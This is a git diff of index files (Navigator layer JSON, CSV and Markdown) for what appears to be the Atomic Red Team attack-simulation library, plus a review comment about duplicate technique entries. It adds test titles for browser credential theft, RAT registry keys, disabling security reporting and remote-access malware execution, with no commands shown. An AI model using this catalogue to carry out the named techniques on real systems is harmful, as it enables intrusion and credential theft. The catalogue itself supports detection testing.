diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
index a8fb7301..67202121 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
@@ -1 +1 @@
-{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"11","navigator":"4.5.5","layer":"4.3"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true}]}
\ No newline at end of file
+{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"11","navigator":"4.5.5","layer":"4.3"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true}]}
\ No newline at end of file
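Review bot: The new layer line repeats the same techniqueID with no `tactic` field to tell the entries apart — T1082 appears twice (one entry labelled `"View Atomic"`, the other `"View Atomics"`, both pointing at the same URL) and T1098 three times, one of them with no `links` at all. Nothing in this file pins down how Navigator resolves duplicate technique entries, so which link label a user sees is presumably whichever entry the loader applies last; emitting one entry per techniqueID with a single `links` array would make the layer deterministic and the labels consistent. The T1098 triple already existed on the old side, so if this JSON is generator output the dedupe belongs in the generator rather than in a hand edit of the minified file.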
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 482b0528..a5f4133b 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -201,6 +201,11 @@ defense-evasion,T1112,Modify Registry,35,Disable Windows Toast Notifications,003
defense-evasion,T1112,Modify Registry,36,Disable Windows Security Center Notifications,45914594-8df6-4ea9-b3cc-7eb9321a807e,command_prompt
defense-evasion,T1112,Modify Registry,37,Suppress Win Defender Notifications,c30dada3-7777-4590-b970-dc890b8cf113,command_prompt
defense-evasion,T1112,Modify Registry,38,Allow RDP Remote Assistance Feature,86677d0e-0b5e-4a2b-b302-454175f9aa9e,command_prompt
+defense-evasion,T1112,Modify Registry,39,NetWire RAT Registry Key Creation,65704cd4-6e36-4b90-b6c1-dc29a82c8e56,command_prompt
+defense-evasion,T1112,Modify Registry,40,Ursnif Malware Registry Key Creation,c375558d-7c25-45e9-bd64-7b23a97c1db0,command_prompt
+defense-evasion,T1112,Modify Registry,41,Terminal Server Client Connection History Cleared,3448824b-3c35-4a9e-a8f5-f887f68bea21,command_prompt
+defense-evasion,T1112,Modify Registry,42,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
+defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Application,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
@@ -218,6 +223,7 @@ defense-evasion,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666
defense-evasion,T1548.001,Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
defense-evasion,T1548.001,Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
+defense-evasion,T1218.008,Odbcconf,2,Odbcconf.exe - Load Response File,331ce274-f9c9-440b-9f8c-a1006e1fce0b,command_prompt
defense-evasion,T1562.006,Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
defense-evasion,T1562.006,Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
defense-evasion,T1562.006,Indicator Blocking,3,Disable Powershell ETW Provider - Windows,6f118276-121d-4c09-bb58-a8fb4a72ee84,powershell
@@ -804,6 +810,7 @@ collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShe
collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
collection,T1115,Clipboard Data,4,Collect Clipboard Data via VBA,9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52,powershell
collection,T1530,Data from Cloud Storage Object,1,Azure - Enumerate Azure Blobs with MicroBurst,3dab4bcc-667f-4459-aea7-4162dd2d6590,powershell
+collection,T1530,Data from Cloud Storage Object,2,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
collection,T1560.002,Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
@@ -903,6 +910,7 @@ credential-access,T1555.003,Credentials from Web Browsers,11,WinPwn - BrowserPwn
credential-access,T1555.003,Credentials from Web Browsers,12,WinPwn - Loot local Credentials - mimi-kittenz,ec1d0b37-f659-4186-869f-31a554891611,powershell
credential-access,T1555.003,Credentials from Web Browsers,13,WinPwn - PowerSharpPack - Sharpweb for Browser Credentials,e5e3d639-6ea8-4408-9ecd-d5a286268ca0,powershell
credential-access,T1555.003,Credentials from Web Browsers,14,Simulating Access to Chrome Login Data - MacOS,124e13e5-d8a1-4378-a6ee-a53cd0c7e369,sh
+credential-access,T1555.003,Credentials from Web Browsers,15,WebBrowserPassView - Credentials from Browser,e359627f-2d90-4320-ba5e-b0f878155bbe,powershell
credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
@@ -1073,6 +1081,7 @@ discovery,T1082,System Information Discovery,19,WinPwn - RBCD-Check,dec6a0d8-bca
discovery,T1082,System Information Discovery,20,WinPwn - PowerSharpPack - Watson searching for missing windows patches,07b18a66-6304-47d2-bad0-ef421eb2e107,powershell
discovery,T1082,System Information Discovery,21,WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors,efb79454-1101-4224-a4d0-30c9c8b29ffc,powershell
discovery,T1082,System Information Discovery,22,WinPwn - PowerSharpPack - Seatbelt,5c16ceb4-ba3a-43d7-b848-a13c1f216d95,powershell
+discovery,T1082,System Information Discovery,23,Azure Security Scan with SkyArk,26a18d3d-f8bc-486b-9a33-d6df5d78a594,powershell
discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
discovery,T1217,Browser Bookmark Discovery,2,List Mozilla Firefox Bookmark Database Files on macOS,1ca1f9c7-44bc-46bb-8c85-c50e2e94267b,sh
@@ -1155,7 +1164,7 @@ discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers
discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
-discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,sh
+discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1046,Network Service Discovery,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
discovery,T1046,Network Service Discovery,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
@@ -1185,6 +1194,7 @@ command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Tes
command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
command-and-control,T1219,Remote Access Software,7,RemotePC Software Execution,fbff3f1f-b0bf-448e-840f-7e1687affdce,powershell
+command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ecca999b-e0c8-40e8-8416-ad320b146a75,powershell
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index ffb5b9a9..30c20e03 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -96,6 +96,7 @@ collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28f
collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1530,Data from Cloud Storage Object,1,Azure - Enumerate Azure Blobs with MicroBurst,3dab4bcc-667f-4459-aea7-4162dd2d6590,powershell
+collection,T1530,Data from Cloud Storage Object,2,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
collection,T1560.002,Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
@@ -217,6 +218,7 @@ discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware,31dad
discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules,8057d484-0fae-49a4-8302-4812c4f1e64e,bash
discovery,T1082,System Information Discovery,7,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,bash
discovery,T1082,System Information Discovery,11,Environment variables discovery on macos and linux,fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
+discovery,T1082,System Information Discovery,23,Azure Security Scan with SkyArk,26a18d3d-f8bc-486b-9a33-d6df5d78a594,powershell
discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
@@ -234,7 +236,7 @@ discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db26
discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbour,158bd4dd-6359-40ab-b13c-285b9ef6fa25,sh
discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
-discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,sh
+discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1090.003,Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv
index 29aec657..47b6fb25 100644
--- a/atomics/Indexes/Indexes-CSV/macos-index.csv
+++ b/atomics/Indexes/Indexes-CSV/macos-index.csv
@@ -156,7 +156,7 @@ discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7f
discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
-discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,sh
+discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 6967ae8f..21d5d5fd 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -151,6 +151,11 @@ defense-evasion,T1112,Modify Registry,35,Disable Windows Toast Notifications,003
defense-evasion,T1112,Modify Registry,36,Disable Windows Security Center Notifications,45914594-8df6-4ea9-b3cc-7eb9321a807e,command_prompt
defense-evasion,T1112,Modify Registry,37,Suppress Win Defender Notifications,c30dada3-7777-4590-b970-dc890b8cf113,command_prompt
defense-evasion,T1112,Modify Registry,38,Allow RDP Remote Assistance Feature,86677d0e-0b5e-4a2b-b302-454175f9aa9e,command_prompt
+defense-evasion,T1112,Modify Registry,39,NetWire RAT Registry Key Creation,65704cd4-6e36-4b90-b6c1-dc29a82c8e56,command_prompt
+defense-evasion,T1112,Modify Registry,40,Ursnif Malware Registry Key Creation,c375558d-7c25-45e9-bd64-7b23a97c1db0,command_prompt
+defense-evasion,T1112,Modify Registry,41,Terminal Server Client Connection History Cleared,3448824b-3c35-4a9e-a8f5-f887f68bea21,command_prompt
+defense-evasion,T1112,Modify Registry,42,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
+defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Application,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
defense-evasion,T1070.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
@@ -159,6 +164,7 @@ defense-evasion,T1070.001,Clear Windows Event Logs,3,Clear Event Logs via VBA,1b
defense-evasion,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
defense-evasion,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique,ccf4ac39-ec93-42be-9035-90e2f26bcd92,powershell
defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
+defense-evasion,T1218.008,Odbcconf,2,Odbcconf.exe - Load Response File,331ce274-f9c9-440b-9f8c-a1006e1fce0b,command_prompt
defense-evasion,T1562.006,Indicator Blocking,3,Disable Powershell ETW Provider - Windows,6f118276-121d-4c09-bb58-a8fb4a72ee84,powershell
defense-evasion,T1562.006,Indicator Blocking,4,Disable .NET Event Tracing for Windows Via Registry (cmd),8a4c33be-a0d3-434a-bee6-315405edbd5b,command_prompt
defense-evasion,T1562.006,Indicator Blocking,5,Disable .NET Event Tracing for Windows Via Registry (powershell),19c07a45-452d-4620-90ed-4c34fffbe758,powershell
@@ -647,6 +653,7 @@ credential-access,T1555.003,Credentials from Web Browsers,10,Stage Popular Crede
credential-access,T1555.003,Credentials from Web Browsers,11,WinPwn - BrowserPwn,764ea176-fb71-494c-90ea-72e9d85dce76,powershell
credential-access,T1555.003,Credentials from Web Browsers,12,WinPwn - Loot local Credentials - mimi-kittenz,ec1d0b37-f659-4186-869f-31a554891611,powershell
credential-access,T1555.003,Credentials from Web Browsers,13,WinPwn - PowerSharpPack - Sharpweb for Browser Credentials,e5e3d639-6ea8-4408-9ecd-d5a286268ca0,powershell
+credential-access,T1555.003,Credentials from Web Browsers,15,WebBrowserPassView - Credentials from Browser,e359627f-2d90-4320-ba5e-b0f878155bbe,powershell
credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
credential-access,T1552.004,Private Keys,6,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell
credential-access,T1552.004,Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
@@ -860,6 +867,7 @@ command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Tes
command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
command-and-control,T1219,Remote Access Software,7,RemotePC Software Execution,fbff3f1f-b0bf-448e-840f-7e1687affdce,powershell
+command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ecca999b-e0c8-40e8-8416-ad320b146a75,powershell
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 46af6a54..e6349fca 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -276,6 +276,11 @@
- Atomic Test #36: Disable Windows Security Center Notifications [windows]
- Atomic Test #37: Suppress Win Defender Notifications [windows]
- Atomic Test #38: Allow RDP Remote Assistance Feature [windows]
+ - Atomic Test #39: NetWire RAT Registry Key Creation [windows]
+ - Atomic Test #40: Ursnif Malware Registry Key Creation [windows]
+ - Atomic Test #41: Terminal Server Client Connection History Cleared [windows]
+ - Atomic Test #42: Disable Windows Error Reporting Settings [windows]
+ - Atomic Test #43: DisallowRun Execution Of Certain Application [windows]
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.001 Binary Padding](../../T1027.001/T1027.001.md)
@@ -310,6 +315,7 @@
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.008 Odbcconf](../../T1218.008/T1218.008.md)
- Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
+ - Atomic Test #2: Odbcconf.exe - Load Response File [windows]
- T1144 Gatekeeper Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1045 Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1388,6 +1394,7 @@
- Atomic Test #4: Collect Clipboard Data via VBA [windows]
- [T1530 Data from Cloud Storage Object](../../T1530/T1530.md)
- Atomic Test #1: Azure - Enumerate Azure Blobs with MicroBurst [iaas:azure]
+ - Atomic Test #2: Azure - Scan for Anonymous Access to Azure Storage (Powershell) [iaas:azure]
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560.002 Archive via Library](../../T1560.002/T1560.002.md)
@@ -1575,6 +1582,7 @@
- Atomic Test #12: WinPwn - Loot local Credentials - mimi-kittenz [windows]
- Atomic Test #13: WinPwn - PowerSharpPack - Sharpweb for Browser Credentials [windows]
- Atomic Test #14: Simulating Access to Chrome Login Data - MacOS [macos]
+ - Atomic Test #15: WebBrowserPassView - Credentials from Browser [windows]
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #1: Private Keys [windows]
@@ -1804,6 +1812,7 @@
- Atomic Test #20: WinPwn - PowerSharpPack - Watson searching for missing windows patches [windows]
- Atomic Test #21: WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors [windows]
- Atomic Test #22: WinPwn - PowerSharpPack - Seatbelt [windows]
+ - Atomic Test #23: Azure Security Scan with SkyArk [azure-ad]
- [T1010 Application Window Discovery](../../T1010/T1010.md)
- Atomic Test #1: List Process Main Windows - C# .NET [windows]
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1995,6 +2004,7 @@
- Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
- Atomic Test #6: Ammyy Admin Software Execution [windows]
- Atomic Test #7: RemotePC Software Execution [windows]
+ - Atomic Test #8: NetSupport - RAT Execution [windows]
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index c396351c..78ace394 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -224,6 +224,7 @@
- T1115 Clipboard Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1530 Data from Cloud Storage Object](../../T1530/T1530.md)
- Atomic Test #1: Azure - Enumerate Azure Blobs with MicroBurst [iaas:azure]
+ - Atomic Test #2: Azure - Scan for Anonymous Access to Azure Storage (Powershell) [iaas:azure]
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560.002 Archive via Library](../../T1560.002/T1560.002.md)
@@ -556,6 +557,7 @@
- Atomic Test #5: Linux VM Check via Kernel Modules [linux]
- Atomic Test #7: Hostname Discovery [linux, macos]
- Atomic Test #11: Environment variables discovery on macos and linux [macos, linux]
+ - Atomic Test #23: Azure Security Scan with SkyArk [azure-ad]
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 8d45c717..7b343754 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -209,6 +209,11 @@
- Atomic Test #36: Disable Windows Security Center Notifications [windows]
- Atomic Test #37: Suppress Win Defender Notifications [windows]
- Atomic Test #38: Allow RDP Remote Assistance Feature [windows]
+ - Atomic Test #39: NetWire RAT Registry Key Creation [windows]
+ - Atomic Test #40: Ursnif Malware Registry Key Creation [windows]
